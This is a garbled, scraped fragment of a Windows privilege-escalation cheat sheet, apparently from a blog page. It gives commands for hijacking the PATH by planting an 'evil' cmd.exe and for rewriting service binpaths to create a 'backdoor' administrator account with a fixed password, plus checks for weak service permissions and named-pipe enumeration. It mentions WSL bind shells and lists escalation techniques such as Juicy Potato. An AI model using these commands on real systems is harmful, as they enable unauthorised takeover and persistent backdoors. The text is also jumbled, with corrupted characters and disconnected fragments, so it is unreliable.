List of exploits kernel : #Security Bulletin #KB #Description #Operating System Send data throught the named pipe : program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe.Find named pipes: ::GetFiles("\\.\pipe\").# List contents of the PATH environment variable # EXAMPLE OUTPUT: C:\Program Files\nodejs\ C:\WINDOWS\system32 $ env:Path # See permissions of the target folder # EXAMPLE OUTPUT: BUILTIN\Users: GR,GW icacls.exe "C:\Program Files\nodejs\ " # Place our evil-file in that folder.Ĭopy evil-file.exe "C:\Program Files\nodejs\cmd.exe "īecause (in this example) "C:\Program Files\nodejs" is before "C:\WINDOWS\system32" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. Don't know the root password? No problem just set the default user to root W/. With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed).
Technique borrowed from Warlockobama's tweet $ sc start EoP - Windows Subsystem for Linux (WSL) $ sc config binpath = "net localgroup Administrators backdoor /add " $ sc config binpath = "net user backdoor backdoor123 /add "
$ accesschk.exe -uwcqv "Authenticated Users " * /accepteula
EoP - Common Vulnerabilities and Exposures.Juicy Potato (Abusing the golden privileges).EoP - Living Off The Land Binaries and Scripts.EoP - From local administrator to NT SYSTEM.EoP - Windows Subsystem for Linux (WSL).EoP - Incorrect permissions in services.Search the registry for key names and passwords.Search for a file with a certain filename.
0 kommentar(er)
